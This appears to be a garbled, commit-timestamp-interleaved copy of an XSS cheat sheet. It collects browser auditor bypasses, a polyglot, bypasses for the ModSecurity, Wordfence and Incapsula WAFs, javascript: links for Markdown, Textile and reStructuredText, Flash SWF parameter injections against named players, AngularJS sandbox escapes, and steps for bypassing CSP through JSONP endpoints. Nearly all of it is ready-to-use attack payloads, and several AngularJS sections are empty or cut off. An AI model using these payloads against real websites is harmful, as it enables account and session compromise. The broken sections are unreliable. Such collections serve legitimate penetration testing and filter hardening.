2017-07-14 14:54:44 +01:00
## XSS
2017-08-17 18:19:56 +01:00
**Chrome XSS-Auditor Bypass** by [@vivekchsm ](https://twitter.com/vivekchsm )
2017-07-14 14:54:44 +01:00
< svg >< animate xlink:href = #x attributeName=href values = & #106 ;avascript:alert(1) />< a id = x >< rect width = 100 height = 100 /></ a >
2017-07-15 20:20:12 +01:00
2017-07-23 14:33:13 -07:00
**Chrome < v60 beta XSS-Auditor Bypass * *
< script src = "data:,alert(1)%250A-- >
2017-08-10 09:47:39 -04:00
**Other Chrome XSS-Auditor Bypasses**
2017-08-04 21:33:15 -06:00
< script > a l e r t ( 1 ) < / s c r i p t
2017-08-10 09:47:39 -04:00
< script > a l e r t ( 1 ) % 0 d % 0 a - - > % 0 9 < / s c r i p t
2017-08-15 19:08:48 +01:00
< x > %00%00%00%00%00%00%00< script > alert ( 1 ) < / script >
2017-08-31 18:43:12 +02:00
**Safari XSS Vector** by [@mramydnei ](https://twitter.com/mramydnei/status/902470271327551489 )
< script > location . href ; 'javascript:alert%281%29' < / script >
2017-07-15 20:20:12 +01:00
**XSS Polyglot** by [Ahmed Elsobky ](https://github.com/0xSobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot )
jaVasCript:/*-/*`/*\` /*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//< /stYle/< /titLe/< /teXtarEa/< /scRipt/--!>\x3csVg/< sVg / oNloAd = alert()// > \x3e
2017-07-14 14:54:44 +01:00
**Kona WAF (Akamai) Bypass**
**ModSecurity WAF Bypass**
Note: This kind of depends on what security level the application is set to. See: https://modsecurity.org/rules.html
< img src = x onerror = prompt(document.domain) onerror = prompt(document.domain) onerror = prompt(document.domain) >
**Wordfence XSS Bypasses**
< meter onmouseover = "alert(1)"
'">>< div > < meter onmouseover = "alert(1)" < / div > "
>>< marquee loop = 1 width = 0 onfinish = alert(1) >
2017-09-12 17:18:29 +02:00
**Incapsula WAF Bypasses** by [@i_bo0om ](https://twitter.com/i_bo0om )
< iframe / onload = 'this["src"]="javas	cript:al"+"ert``"' ; >
< img / src = q onerror = 'new Function `al\ert\` 1 \``' >
2017-07-14 14:54:44 +01:00
**jQuery < 3.0.0 XSS * *
by [Egor Homakov ](https://github.com/jquery/jquery/issues/2432 )
In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
1) Find any cross domain requests to untrusted domains which may inadvertently execute script.
2) Find any requests to trusted API endpoints where script can be injected into data sources.
**URL verification bypasses (works without `	` too)**
javas& #x09 ; cript://www.google.com/%0Aalert(1)
**Markdown XSS**
2017-08-16 09:01:27 +01:00
[a ](javascript:confirm(1 )
2017-07-14 14:54:44 +01:00
[a ](javascript://www.google.com%0Aprompt(1 ))
2017-07-16 14:33:34 +03:00
2017-10-07 08:50:31 +01:00
[a ](javascript://%0d%0aconfirm(1 ))
2017-08-16 09:01:27 +01:00
[a ](javascript://%0d%0aconfirm(1 );com)
[a ](javascript:window.onerror=confirm;throw%201 )
2017-10-07 08:50:31 +01:00
[a]: (javascript:prompt(1))
2017-09-27 19:45:22 +01:00
**Flash SWF XSS**
- ZeroClipboard: `ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf`
- plUpload Player: `plupload.flash.swf?%#target%g=alert&uid%g=XSS&`
2017-09-27 19:57:21 +01:00
- plUpload MoxiePlayer: `Moxie.swf?target%g=confirm&uid%g=XSS` (also works with `Moxie.cdn.swf` and other variants)
2017-09-27 19:45:22 +01:00
- FlashMediaElement: < code > flashmediaelement.swf?jsinitfunctio%gn=alert`1` </ code >
2017-10-01 22:04:49 +01:00
- videoJS: `video-js.swf?readyFunction=confirm` and `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29`
2017-09-27 19:45:22 +01:00
2017-09-27 19:48:38 +01:00
- YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//`
2017-09-27 19:45:22 +01:00
- YUI "uploader.swf": `uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<`
- Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()`
2017-10-01 10:19:34 +01:00
- AutoDemo: `control.swf?onend=javascript:alert(1)//`
- Adobe FLV Progressive: `/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//` and `/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//`
2017-09-27 19:57:21 +01:00
- Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//`
2017-09-27 19:45:22 +01:00
2017-09-27 19:48:38 +01:00
- JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)`
2017-09-27 19:45:22 +01:00
- SWFUpload `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//`
2017-10-18 16:50:27 +01:00
- Uploadify (legacy): `uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf`
2017-09-27 19:45:22 +01:00
- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`
2017-10-18 16:50:27 +01:00
_Note: Useful reference on constructing Flash-based XSS payloads available at [MWR Labs ](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/ )._
2017-09-27 19:48:38 +01:00
2017-08-16 09:01:27 +01:00
**Lightweight Markup Languages**
**RubyDoc** (.rdoc)
2017-08-16 09:24:39 +01:00
**Textile** ([.textile ](https://txstyle.org/ ))
2017-08-16 09:01:27 +01:00
"Test link":javascript:alert(1)
2017-08-16 09:24:39 +01:00
**reStructuredText** ([.rst ](http://docutils.sourceforge.net/docs/user/rst/quickref.html ))
2017-08-16 09:01:27 +01:00
`Test link` __.
__ javascript:alert(document.domain)
2017-08-28 16:36:49 +02:00
**Unicode characters**
2017-10-18 16:50:27 +01:00
†‡•< img src=a onerror=javascript:alert('test')>…‰€
2017-08-28 16:36:49 +02:00
2017-07-16 12:46:53 +01:00
**AngularJS Template Injection based XSS**
2017-07-16 14:33:34 +03:00
2017-08-16 09:24:39 +01:00
*For manual verification on a live target, use `angular.version` in your browser console*
2017-08-16 09:22:29 +01:00
2017-07-16 14:33:34 +03:00
**1.0.1 - 1.1.5** by [Mario Heiderich (Cure53) ](https://twitter.com/0x6D6172696F )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
**1.2.0 - 1.2.1** by [Jan Horn (Google) ](https://twitter.com/tehjh )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
**1.2.2 - 1.2.5** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
**1.2.6 - 1.2.18** by [Jan Horn (Google) ](https://twitter.com/tehjh )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
**1.2.19 - 1.2.23** by [Mathias Karlsson ](https://twitter.com/avlidienbrunn )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
**1.2.24 - 1.2.29** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
**1.3.0** by [Gábor Molnár (Google) ](https://twitter.com/molnar_g )
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
{{!ready & & (ready = true) & & (
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) & &
(apply = constructor) & &
(valueOf = call) & &
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
**1.3.1 - 1.3.2** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
**1.3.3 - 1.3.18** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
$eval('x=alert(1)//'); }}
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
**1.3.19** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
**1.3.20** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
**1.4.0 - 1.4.9** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
**1.5.0 - 1.5.8** by [Ian Hickey ](https://twitter.com/ianhickey1024 )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
2017-07-16 12:46:53 +01:00
2017-07-16 14:33:34 +03:00
**1.5.9 - 1.5.11** by [Jan Horn (Google) ](https://twitter.com/tehjh )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
2017-07-16 12:46:53 +01:00
2017-08-16 09:22:29 +01:00
**1.6.0+** (no [Expression Sandbox ](http://angularjs.blogspot.co.uk/2016/09/angular-16-expression-sandbox-removal.html )) by [Mario Heiderich (Cure53) ](https://twitter.com/0x6D6172696F )
2017-07-16 12:46:53 +01:00
2017-07-16 23:13:15 +01:00
2017-07-16 14:33:34 +03:00
2017-10-28 19:16:27 +02:00
**Content Security Policy (CSP) bypass via JSONP endpoints**
Grab the target's CSP:
curl -I http://example.com | grep 'Content-Security-Policy'
Either paste the CSP into https://csp-evaluator.withgoogle.com/ or just submit the target's address into the "Content Security Policy" field. The CSP Evaluator will notify you if one of the whitelisted domains has JSONP endpoints.
![image ](https://user-images.githubusercontent.com/18099289/32136707-a1c12510-bc12-11e7-8a80-8a22b3e94232.png )
Now we can use a Google dork to find some JSONP endpoints on the domains listed above.
site:example.com inurl:callback